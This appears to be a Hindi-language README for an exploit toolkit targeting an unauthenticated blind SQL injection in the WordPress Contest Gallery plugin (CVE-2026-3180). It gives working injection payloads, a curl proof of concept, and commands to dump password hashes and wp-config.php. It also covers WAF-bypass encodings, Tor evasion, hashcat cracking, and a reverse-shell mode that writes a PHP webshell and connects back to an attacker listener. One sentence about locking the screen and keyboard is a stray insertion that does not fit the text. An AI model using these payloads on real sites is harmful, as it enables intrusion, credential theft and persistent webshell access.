
CVE-2026-3180 के लिए पूर्ण शोषण टूलकिट - WordPress Contest Gallery SQL Injection कमजोरी। इसमें स्वचालित डेटा निष्कर्षण, WAF बाईपास, रिवर्स शेल, SQLMap एकीकरण, Burp एक्सटेंशन जनरेशन और पेनिट्रेशन टेस्टिंग तथा सुरक्षा अनुसंधान के लिए रिपोर्टिंग शामिल है।
CVE-2026-3180 के लिए प्रूफ-ऑफ-कॉन्सेप्ट मूल्यांकन उपकरण
लेखक: Sudeepa Wanigarathna · मूल खोज: cardosource
[!IMPORTANT] केवल अधिकृत उपयोग। यह उपकरण सुरक्षा अनुसंधान, शिक्षा, और उन प्रणालियों के परीक्षण के लिए है जिनके आप स्वामी हैं या जिनके मूल्यांकन के लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं लेता है।
CVE-2026-3180 वर्डप्रेस Contest Gallery प्लगइन में एक उच्च-गंभीरता, अप्रमाणित ब्लाइंड SQL इंजेक्शन है। यह दोष post_cg1l_resend_unconfirmed_mail_frontend AJAX हैंडलर में मौजूद है, जहाँ cgl_mail पैरामीटर को उचित स्वच्छता के बिना SQL क्वेरी में पास किया जाता है।
यह रिपॉजिटरी अधिकृत सुरक्षा पेशेवरों के लिए एक पूर्ण-विशेषताओं वाला Python PoC (v2.0) प्रदान करता है ताकि प्रभाव को मान्य किया जा सके, वर्डप्रेस डेटा निकाला जा सके, रिपोर्ट तैयार की जा सके, और उद्योग-मानक उपकरणों (SQLMap, Burp Suite, Nuclei) के साथ एकीकृत किया जा सके।
| फ़ील्ड | मान |
|---|
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example Content-Type: application/x-www-form-urlencoded
action=post_cg1l_resend_unconfirmed_mail_frontend &cgl_mail=qualquer'OR/**/1=1#@teste.com &cgl_page_id=1 &cgl_activation_key= &cg_nonce=%20
### संदर्भ
- [CVE-2026-3180](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3180)
- [Exploit-DB 52609](https://www.exploit-db.com/exploits/52609)
- [मूल लेख (cardosource)](https://dev.to/22l31on/wordpress-contest-gallery-plugin-vulnerability-2ff6)
---
## विशेषताएँ
### मुख्य शोषण
| क्षमता | विवरण |
|---|---|
| भेद्यता पहचान | बूलियन, समय-आधारित, त्रुटि-आधारित, यूनियन और स्टैक्ड क्वेरी परीक्षण |
| अंध निष्कर्षण | बूलियन अनुमान के माध्यम से बाइनरी-खोज वर्ण निष्कर्षण |
| पूर्ण डेटा डंप | उपयोगकर्ता, डेटाबेस मेटाडेटा, विकल्प, प्लगइन्स, थीम, पोस्ट, तालिकाएँ |
| इंटरैक्टिव SQL शेल | बैकएंड के विरुद्ध मनमानी `SELECT` क्वेरी चलाएँ |
| wp-config.php निष्कर्षण | सामान्य पथों के विरुद्ध `LOAD_FILE()` प्रयास |
| रिवर्स शेल | PHP वेबशेल `INTO OUTFILE` / `DUMPFILE` के माध्यम से लिखें (जब अनुमति हो) |
### चोरी और प्रदर्शन
| क्षमता | विवरण |
|---|---|
| WAF बायपास | 15+ एन्कोडिंग और अस्पष्टीकरण तकनीकें |
| मल्टी-थ्रेडिंग | तेज निष्कर्षण के लिए कॉन्फ़िगरेबल वर्कर थ्रेड |
| दर सीमित करना | अनुरोधों के बीच कॉन्फ़िगरेबल विलंब |
| पुनः प्रयास तर्क | क्षणिक विफलताओं पर स्वचालित पुनः प्रयास |
| यूज़र-एजेंट रोटेशन | प्रति अनुरोध यादृच्छिक ब्राउज़र फिंगरप्रिंट |
| प्रॉक्सी समर्थन | HTTP/SOCKS प्रॉक्सी और Tor (`socks5h://127.0.0.1:9050`) |
### रिपोर्टिंग और एकीकरण
| क्षमता | विवरण |
|---|---|
| रिपोर्ट निर्माण | निष्कर्षण सारांश के साथ JSON और HTML रिपोर्ट |
| SQLMap एकीकरण | टैम्पर्स के साथ स्वचालित SQLMap कमांड उत्पन्न करें |
| Burp Suite एक्सटेंशन | जनरेटर + स्टैंडअलोन `burp_contest_gallery.py` |
| Nuclei टेम्पलेट | सामूहिक पहचान के लिए YAML टेम्पलेट |
| Metasploit मॉड्यूल | Ruby सहायक मॉड्यूल (`contest_gallery_sqli.rb`) |
| शेल ऑटोमेशन | curl-आधारित और SQLMap वर्कफ़्लो के लिए Bash स्क्रिप्ट |
### संचालन
| क्षमता | विवरण |
|---|---|
| रंगीन CLI आउटपुट | गंभीरता स्तरों के साथ संरचित लॉगिंग |
| प्रगति ट्रैकिंग | रीयल-टाइम मीट्रिक (अनुरोध, समय, निष्कर्षण गति) |
| शांत / विस्तृत मोड | स्क्रिप्टिंग और डिबगिंग के लिए उपयुक्त |
| सिग्नल हैंडलिंग | `Ctrl+C` पर सुचारू सफाई |
| Docker तैयार | कंटेनरीकृत तैनाती समर्थन |
| CI/CD पाइपलाइन तैयार | ऑटोमेशन के लिए एग्जिट कोड और JSON आउटपुट |
---
## स्थापना
### पूर्वापेक्षाएँ
- Python **3.8+**
- `pip`
- परीक्षण के तहत लक्ष्य तक नेटवर्क पहुंच
### वैकल्पिक बाहरी उपकरण
| उपकरण | उद्देश्य |
|---|---|
| [SQLMap](https://github.com/sqlmapproject/sqlmap) | स्वचालित SQL इंजेक्शन |
| [Burp Suite](https://portswigger.net/burp) | मैनुअल परीक्षण और एक्सटेंशन होस्टिंग |
| [Nuclei](https://github.com/projectdiscovery/nuclei) | टेम्पलेट-आधारित स्कैनिंग |
| [Hashcat](https://hashcat.net/hashcat/) | ऑफलाइन हैश क्रैकिंग |
| [Tor](https://www.torproject.org/) | अनाम रूटिंग (`--proxy tor`) |
### सेटअप```bash
git clone https://github.com/CerberusMrXi/WP-Contest-Gallery-28.1.4-Exploit.git
cd WP-Contest-Gallery-28.1.4-Exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 cve-2026-3180.py --help
आवश्यक (रनटाइम):```text requests>=2.31.0
**अनुशंसित (requirements.txt से):**```text
colorama>=0.4.6
tqdm>=4.65.0
pyyaml>=6.0
python-dateutil>=2.8.2
urllib3>=2.0.0
मुख्य एक्सप्लॉइट केवल Python मानक लाइब्रेरी और
requestsका उपयोग करता है। अतिरिक्त पैकेज आउटपुट और रिपोर्टिंग को बेहतर बनाते हैं।
http://target.exampleको केवल प्रयोगशाला या अधिकृत लक्ष्य से बदलें।
python3 cve-2026-3180.py http://target.example --scan
### पूर्ण शोषण (पता लगाना + निकालना)```bash
python3 cve-2026-3180.py http://target.example
python3 cve-2026-3180.py http://target.example --dump users
### इंटरैक्टिव SQL शेल```bash
python3 cve-2026-3180.py http://target.example --sql-shell
python3 cve-2026-3180.py http://target.example --report html -o assessment.html
### Burp प्रॉक्सी के माध्यम से```bash
python3 cve-2026-3180.py http://target.example --proxy http://127.0.0.1:8080 -v
python3 cve-2026-3180.py http://target.example --scan
बूलियन, समय-आधारित और त्रुटि-आधारित पहचान को पूर्ण निष्कर्षण के बिना चलाता है।
### पूर्ण डेटा निष्कर्षण```bash
python3 cve-2026-3180.py http://target.example --dump all
डेटाबेस जानकारी, उपयोगकर्ता, विकल्प, प्लगइन्स, थीम, पोस्ट, तालिकाएँ और सिस्टम मेटाडेटा निकालता है।
python3 cve-2026-3180.py http://target.example --dump database python3 cve-2026-3180.py http://target.example --dump users python3 cve-2026-3180.py http://target.example --dump config python3 cve-2026-3180.py http://target.example --dump options python3 cve-2026-3180.py http://target.example --dump plugins python3 cve-2026-3180.py http://target.example --dump themes
### इंटरैक्टिव SQL शेल```bash
python3 cve-2026-3180.py http://target.example --sql-shell
PORT स्कैनिंग रेंज निर्दिष्ट करें, जैसे 1-1000 या 80,443,8080।
पोर्ट फॉर्मेट
801-100080,443,808080,443,8000-9000पोर्ट स्कैनिंग मोड
-p- = सभी 65535 पोर्ट को स्कैन करें--top-ports 1000 = शीर्ष 1000 पोर्ट को स्कैन करें (Nmap की तरह)--top-ports डिफ़ॉल्ट रूप से शीर्ष 1000 पोर्ट का उपयोग करता है```text
sql> SELECT DATABASE()
wordpresssql> show users [ { "username": "admin", "email": "[email protected]", "password_hash": "$P$B..." } ]
sql> show tables ["wp_users", "wp_posts", "wp_options", ...]
sql> exit
**शेल कमांड:**
| कमांड | विवरण |
|---|---|
| `SELECT ...` | SQL क्वेरी निष्पादित करें और परिणाम प्रिंट करें |
| `show users` | कैश्ड निकाले गए उपयोगकर्ताओं को प्रदर्शित करें |
| `show tables` | कैश्ड तालिका सूची प्रदर्शित करें |
| `show database` | कैश्ड DB मेटाडेटा प्रदर्शित करें |
| `show config` | यदि निकाला गया हो तो wp-config.php प्रदर्शित करें |
| `show options` | WordPress विकल्प प्रदर्शित करें |
| `show plugins` | सक्रिय प्लगइन्स प्रदर्शित करें |
| `help` | उपलब्ध कमांड सूचीबद्ध करें |
| `exit` / `quit` | शेल से बाहर निकलें |
### रिपोर्ट जनरेशन```bash
# JSON report (default, saved to reports/)
python3 cve-2026-3180.py http://target.example --report json
# HTML report with custom filename
python3 cve-2026-3180.py http://target.example --report html -o reports/assessment.html
nc -lvnp 4444
python3 cve-2026-3180.py http://target.example --reverse-shell 10.0.0.5 4444
> इसके लिए `FILE` विशेषाधिकार, लिखने योग्य webroot, और `secure_file_priv` द्वारा लक्ष्य पथ को अवरुद्ध न करने की आवश्यकता है।
### SQLMap कमांड जनरेशन```bash
python3 cve-2026-3180.py http://target.example --sqlmap
या बंडल की गई ऑटोमेशन स्क्रिप्ट का उपयोग करें:```bash chmod +x sqlmap_automation.sh ./sqlmap_automation.sh http://target.example
### Burp Suite एक्सटेंशन```bash
# Generate extension from exploit
python3 cve-2026-3180.py http://target.example --burp-extension
# Or load the standalone extension
# Burp → Extender → Extensions → Add → Python → burp_contest_gallery.py
python3 cve-2026-3180.py http://target.example --nuclei-template
nuclei -u http://target.example -t CVE-2026-3180.yaml
### Bash ऑटोमेशन (कोई Python नहीं)```bash
chmod +x cve-2026-3180_automated.sh
./cve-2026-3180_automated.sh http://target.example
python3 cve-2026-3180.py http://target.example --proxy tor
### प्रदर्शन ट्यूनिंग```bash
python3 cve-2026-3180.py http://target.example \
--threads 20 \
--timeout 15 \
--delay 0.1 \
--retries 5 \
-v
| तर्क | विवरण |
|---|---|
target | लक्ष्य WordPress आधार URL (जैसे http://target.example) |
| तर्क | विवरण |
|---|---|
--verbose, -v | डीबग लॉगिंग सक्षम करें |
--quiet | कंसोल आउटपुट दबाएं |
--output, -o |
यह टूल स्वचालित रूप से कई इंजेक्शन रणनीतियों का परीक्षण और उपयोग करता है:
PayloadManager 12+ इंजेक्शन टेम्पलेट्स में घूमता है:```text
'OR//{condition}#@teste.com
'OR{condition}-- -
')OR{condition}#
'))OR{condition}#
'OR//{condition}OR//'1'='1'#
'UNION//SELECT{condition}#
...
### बूलियन निष्कर्षण एल्गोरिदम
1. सत्य/असत्य आधार रेखा लंबाई के माध्यम से कमजोरी की पुष्टि करें
2. लक्ष्य क्वेरी परिणाम की `LENGTH()` का बाइनरी-खोज करें
3. प्रति वर्ण स्थिति के लिए `ASCII(SUBSTRING(...))` का बाइनरी-खोज करें
4. निकाले गए वर्णों से पूर्ण स्ट्रिंग इकट्ठा करें
---
## WAF बाईपास
बिल्ट-इन अस्पष्टीकरण तकनीकें यादृच्छिक रूप से या मांग पर लागू की जाती हैं:
| तकनीक | विवरण |
|---|---|
| `comment_obfuscation` | रिक्त स्थानों को `/**/`, `/*!*/`, `-- `, `#` से बदलें |
| `case_variation` | वर्णमाला वर्णों में यादृच्छिक अपर/लोअर केस |
| `url_encoding` | मानक प्रतिशत-एन्कोडिंग |
| `double_url_encoding` | नेस्टेड प्रतिशत-एन्कोडिंग |
| `hex_encoding` | `%41`-शैली हेक्स एन्कोडिंग |
| `unicode_encoding` | `%u0041`-शैली यूनिकोड एन्कोडिंग |
| `white_space_variation` | रिक्त स्थानों के बजाय टैब, नई पंक्तियाँ, फॉर्म फीड |
| `keyword_obfuscation` | कीवर्ड विभाजित करें: `SEL/**/ECT`, `UNI/**/ION` |
| `concat_obfuscation` | `CHAR()` को `\|\|` के माध्यम से जोड़ना |
| `char_obfuscation` | `CHAR()` को `+` के माध्यम से जोड़ना |
रूपांतरित पेलोड का उदाहरण:```text
qualquer'OR/**/1=1#@teste.com
→ qualquer'%2F**%2FOR%2F**%2F1%3D1%23%40teste.com
{ "username": "admin", "password_hash": "$P$Bxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", "email": "[email protected]", "roles": ["administrator"] }
### पासवर्ड हैश क्रैकिंग (ऑफ़लाइन)
निष्कर्षण के बाद, Hashcat के साथ WordPress phpass हैश को क्रैक करें:```bash
# Save hashes to file
python3 cve-2026-3180.py http://target.example --dump users -o users.json
# Crack with Hashcat (mode 400 = phpass)
hashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
उत्पन्न आदेश (--sqlmap के माध्यम से):```bash
sqlmap -u "http://target.example/wp-admin/admin-ajax.php"
--data "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"
-p cgl_mail
--dbms=mysql
--level=3 --risk=2
--batch
--threads=5
--time-sec=5
--retries=3
--delay=0.05
--random-agent
--hex
--tamper=space2comment,randomcase,between,charencode
--dbs
### Burp Suite
1. `burp_contest_gallery.py` को **Extender → Extensions → Add** में लोड करें
2. **CVE-2026-3180** टैब खोलें
3. लक्ष्य URL दर्ज करें और **Exploit** पर क्लिक करें
4. पैसिव स्कैनर AJAX अनुरोधों की जाँच करता है Contest Gallery संकेतकों के लिए
### Nuclei```yaml
id: CVE-2026-3180
info:
name: WordPress Contest Gallery SQL Injection
severity: high
classification:
cve-id: CVE-2026-3180
cvss-score: 7.5
requests:
- method: POST
path: /wp-admin/admin-ajax.php
body: "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"
cp contest_gallery_sqli.rb ~/.msf4/modules/auxiliary/scanner/http/
msfconsole -q -x "use auxiliary/scanner/http/contest_gallery_sqli; set RHOSTS target.example; run"
## हमला श्रृंखला```mermaid
flowchart TD
A["Unauthenticated POST to admin-ajax.php"] --> B["cgl_mail parameter unsanitized"]
B --> C{"Injection type?"}
C -->|Boolean| D["Response length inference"]
C -->|Time| E["SLEEP delay inference"]
C -->|Error| F["SQL error leakage"]
D --> G["Binary-search extraction"]
E --> G
F --> G
G --> H["WordPress data exfiltration"]
H --> I["Users / hashes / options / config"]
I --> J["Optional: OUTFILE webshell"]
post_cg1l_resend_unconfirmed_mail_frontend AJAX क्रिया।cgl_mail मान बिना पैरामीटरीकरण के SQL में संयोजित किया गया।[] Target: http://target.example [] Checking vulnerability... [+] Target is VULNERABLE! (Boolean-based) [+] Response length difference: 42 chars [*] Extracting database information... [+] name: wordpress [+] version: 8.0.35 [+] Found 3 users [+] Exploitation complete!
### JSON रिपोर्ट संरचना```json
{
"metadata": {
"cve": "CVE-2026-3180",
"cvss_score": "7.5 (High)",
"type": "boolean_based"
},
"target": {
"url": "http://target.example",
"ajax_url": "http://target.example/wp-admin/admin-ajax.php"
},
"vulnerability": {
"vulnerable": true,
"type": "boolean_based"
},
"extracted_data": {
"database": { "name": "wordpress", "version": "8.0.35" },
"users": [],
"tables": [],
"plugins": [],
"options": {}
},
"summary": {
"users_found": 3,
"tables_found": 12,
"plugins_found": 8,
"config_extracted": false
}
}
रिपोर्ट्स डिफ़ॉल्ट रूप से reports/ में सहेजी जाती हैं।
FROM python:3.11-slim
WORKDIR /app COPY requirements.txt cve-2026-3180.py ./ RUN pip install --no-cache-dir -r requirements.txt
ENTRYPOINT ["python3", "cve-2026-3180.py"] CMD ["--help"]
प्रोग्राम से पहले आपके कंप्यूटर स्क्रीन को ब्लॉक करेगा और आपके कीबोर्ड को लॉक कर देगा।```bash
# Build
docker build -t cve-2026-3180 .
# Scan
docker run --rm cve-2026-3180 http://target.example --scan
# Full exploit with report volume
docker run --rm -v $(pwd)/reports:/app/reports cve-2026-3180 \
http://target.example --report json
अधिकृत स्टेजिंग स्कैन के लिए उदाहरण GitHub Actions वर्कफ़्लो:```yaml name: CVE-2026-3180 Staging Scan
on: workflow_dispatch: schedule: - cron: '0 2 * * 1'
jobs: scan: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4
- uses: actions/setup-python@v5
with:
python-version: '3.11'
- run: pip install -r requirements.txt
- name: Vulnerability scan
run: |
python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
--scan --quiet
continue-on-error: true
- name: Generate report
run: |
python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
--report json -o reports/staging.json
- uses: actions/upload-artifact@v4
with:
name: security-report
path: reports/
---
## समस्या निवारण
| लक्षण | क्या प्रयास करें |
|---|---|
| लक्ष्य भेद्य नहीं है | सुनिश्चित करें Contest Gallery ≤ 28.1.4 स्थापित और सक्रिय है |
| प्रतिक्रिया लंबाई में कोई अंतर नहीं | समय-आधारित फॉलबैक के लिए `--scan` आज़माएं; `--timeout` बढ़ाएं |
| बहुत धीमा निष्कर्षण | `--threads` बढ़ाएं; सावधानी से `--delay` घटाएं |
| कनेक्शन त्रुटियां | `--timeout` और `--retries` बढ़ाएं; प्रॉक्सी सेटिंग्स जांचें |
| WAF अनुरोधों को ब्लॉक कर रहा है | `--proxy tor` का उपयोग करें; टूल स्वचालित रूप से बाइपास तकनीक लागू करता है |
| Tor प्रॉक्सी विफल होता है | `127.0.0.1:9050` पर Tor की पुष्टि करें; यदि आवश्यक हो तो `requests[socks]` स्थापित करें |
| खाली उपयोगकर्ता डंप | टेबल प्रीफ़िक्स `wp_` नहीं हो सकता; कस्टम क्वेरीज़ के साथ `--sql-shell` का उपयोग करें |
| wp-config नहीं मिला | वैकल्पिक `LOAD_FILE()` पथ के साथ `--sql-shell` आज़माएं |
| रिवर्स शेल विफल होता है | `FILE` विशेषाधिकार, `secure_file_priv`, वेबरूट अनुमतियां जांचें |
### डीबग कार्यप्रवाह```bash
# Verbose scan
python3 cve-2026-3180.py http://target.example --scan -v
# Through Burp
python3 cve-2026-3180.py http://target.example \
--proxy http://127.0.0.1:8080 -v --scan
# Manual curl verification
curl -s -X POST "http://target.example/wp-admin/admin-ajax.php" \
-d "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=qualquer'OR/**/1=1#@teste.com&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20" \
-w "\nSize: %{size_download}\n"
exploit/ ├── cve-2026-3180.py # Main exploit tool (v2.0) ├── requirements.txt # Python dependencies ├── README.md # This file ├── burp_contest_gallery.py # Standalone Burp Suite extension ├── contest_gallery_sqli.rb # Metasploit auxiliary module ├── cve-2026-3180_automated.sh # Bash/curl automation script ├── sqlmap_automation.sh # SQLMap wrapper script ├── reports/ # Generated reports (created at runtime) ├── backups/ # Database backups (created at runtime) ├── payloads/ # Custom payload storage └── venv/ # Local virtualenv (optional, not committed)
---
## संस्करण इतिहास
### v2.0.0 — अल्टीमेट संस्करण (जनवरी 2026)
- Boolean, time, error, union, and stacked injection detection
- पूर्ण वर्डप्रेस डेटा निष्कर्षण पाइपलाइन
- 15+ WAF बायपास तकनीकें
- इंटरैक्टिव SQL शेल
- JSON / HTML रिपोर्ट जनरेशन
- SQLMap, Burp, और Nuclei इंटीग्रेशन
- `INTO OUTFILE` के माध्यम से रिवर्स शेल
- प्रॉक्सी और Tor समर्थन
- रीट्री लॉजिक के साथ मल्टी-थ्रेडिंग
- रंगीन आउटपुट और संरचित लॉगिंग
### v1.0 — प्रारंभिक रिलीज़
- बुनियादी boolean-आधारित डिटेक्शन
- मैन्युअल उपयोगकर्ता निष्कर्षण
---
## अस्वीकरण
यह प्रोजेक्ट **जैसे हैं वैसे** **रक्षात्मक सुरक्षा अनुसंधान** और **अधिकृत पैठ परीक्षण** के लिए प्रदान किया गया है।
इस सॉफ्टवेयर का उपयोग करके आप सहमत हैं कि:
1. आप केवल उन सिस्टमों को लक्षित करेंगे जिनके आप मालिक हैं या जिनका परीक्षण करने के लिए आप स्पष्ट रूप से अधिकृत हैं।
2. आप लागू कंप्यूटर-दुरुपयोग और डेटा-सुरक्षा कानूनों को समझते हैं।
3. लेखक और योगदानकर्ता दुरुपयोग से होने वाली क्षति, डेटा हानि, या कानूनी परिणामों के लिए **जिम्मेदार नहीं हैं**।
यदि आप उत्पादन में इस कमजोरी की खोज करते हैं, तो जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और जहां उपयुक्त हो प्लगइन विक्रेता / वर्डप्रेस सुरक्षा टीम के साथ समन्वय करें।
---
## लेखक और श्रेय
| भूमिका | नाम |
|---|---|
| **उपकरण लेखक** | Sudeepa Wanigarathna |
| **मूल खोज** | cardosource |
| **CVE** | CVE-2026-3180 |
| **लाइसेंस** | MIT |
---
## लाइसेंस```
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
केवल अधिकृत सुरक्षा परीक्षण के लिए।
| गुण | मान |
|---|
| CVE ID | CVE-2026-3180 |
| CVSS | 7.5 (उच्च) |
| हमला वेक्टर | नेटवर्क — अप्रमाणित |
| प्रभाव | गोपनीयता उल्लंघन, डेटाबेस पढ़ना, क्रेडेंशियल चोरी |
| प्रभावित उत्पाद | WordPress Contest Gallery प्लगइन |
| प्रभावित संस्करण | 28.1.4 और पुराने |
| भेद्यता प्रकार | ब्लाइंड SQL इंजेक्शन |
| DBMS | MySQL / MariaDB |
| URL | /wp-admin/admin-ajax.php |
| Method | POST |
| Action | post_cg1l_resend_unconfirmed_mail_frontend |
| भेद्य पैरामीटर | cgl_mail |
| तर्क | डिफ़ॉल्ट | विवरण |
|---|
--proxy | — | प्रॉक्सी URL या Tor के माध्यम से SOCKS5 के लिए tor |
--timeout | 10 | HTTP अनुरोध टाइमआउट (सेकंड) |
--delay | 0.05 | अनुरोधों के बीच विलंब (सेकंड) |
--retries | 3 | असफल अनुरोधों पर पुनः प्रयास संख्या |
--threads, -t | 5 | थ्रेड पूल आकार |
| कस्टम आउटपुट फ़ाइल पथ |
| तर्क | विवरण |
|---|
| (डिफ़ॉल्ट) | पूर्ण शोषण: पता लगाएं → स्कैन करें → सभी निकालें |
--scan | केवल कमजोरी का पता लगाना |
--sql-shell | इंटरैक्टिव SQL शेल |
--dump {users,config,database,options,plugins,themes,all} | विशिष्ट डेटा निकालें |
--report {json,html} | मूल्यांकन रिपोर्ट उत्पन्न करें |
--reverse-shell LHOST LPORT | फ़ाइल लेखन के माध्यम से रिवर्स शेल का प्रयास करें |
--sqlmap | SQLMap कमांड प्रिंट करें |
--burp-extension | Burp Suite एक्सटेंशन उत्पन्न करें |
--nuclei-template | Nuclei YAML टेम्पलेट उत्पन्न करें |
| प्रकार | पता लगाने की विधि | उपयोग का मामला |
|---|
| बूलियन-आधारित | प्रतिक्रिया लंबाई अंतर (1=1 बनाम 1=2) | प्राथमिक निष्कर्षण इंजन |
| समय-आधारित | SLEEP() विलंब अनुमान | जब बूलियन संकेत कमजोर हों तो बैकअप |
| त्रुटि-आधारित | EXTRACTVALUE() / SQL त्रुटि स्ट्रिंग | जब त्रुटियां लीक होती हैं तो तेज़ मेटाडेटा |
| यूनियन-आधारित | UNION SELECT पेलोड | प्रत्यक्ष मान पुनर्प्राप्ति (जब लागू हो) |
| स्टैक्ड क्वेरीज़ | '; ... # सिंटैक्स | बहु-कथन निष्पादन (दुर्लभ) |
| लक्ष्य | SQL स्रोत | आउटपुट कुंजी |
|---|
| डेटाबेस नाम | SELECT DATABASE() | database.name |
| डेटाबेस संस्करण | SELECT VERSION() | database.version |
| डेटाबेस उपयोगकर्ता | SELECT USER() | database.user |
| तालिकाएँ | information_schema.TABLES | tables[] |
| स्तंभ | information_schema.COLUMNS | columns{} |
| WP उपयोगकर्ता | wp_users | users[] |
| पासवर्ड हैश | wp_users.user_pass | users[].password_hash |
| ईमेल | wp_users.user_email | users[].email |
| भूमिकाएँ | wp_usermeta क्षमताएँ | users[].roles |
| साइट विकल्प | wp_options | options{} |
| सक्रिय प्लगइन्स | wp_options.active_plugins | plugins[] |
| थीम | template / stylesheet विकल्प | themes[] |
| पोस्ट | wp_posts | posts[] |
| wp-config.php | LOAD_FILE('/var/www/html/wp-config.php') | config |
| सिस्टम जानकारी | @@hostname, @@datadir, आदि | system_info{} |